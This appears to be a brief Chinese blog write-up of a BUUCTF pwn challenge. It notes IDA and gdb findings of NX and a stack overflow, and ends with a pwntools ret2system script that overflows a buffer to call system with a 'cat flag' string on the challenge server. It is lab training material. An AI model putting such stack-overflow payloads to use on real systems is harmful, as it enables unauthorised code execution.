日常buu

国际惯例

日常buu

 

 

Ida

日常buu

 

 

没啥问题,去看看mem_test函数有没有问题。

日常buu

 

 

NX还有栈溢出难道是ROP?还是gdb看看hint是啥吧。

日常buu

 

 

哦豁!

日常buu

 

 哦豁!

日常buu

 

 

日常buu

 

 

那这样思路有了栈溢出system执行catflag。

from pwn import*

r=remote("node3.buuoj.cn",27175)

system_addr = 0x08048440

catflag_addr = 0x080487E0

payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)

r.sendline(payload)

r.interactive()

 

上一篇:request接口测试


下一篇:2021-10-09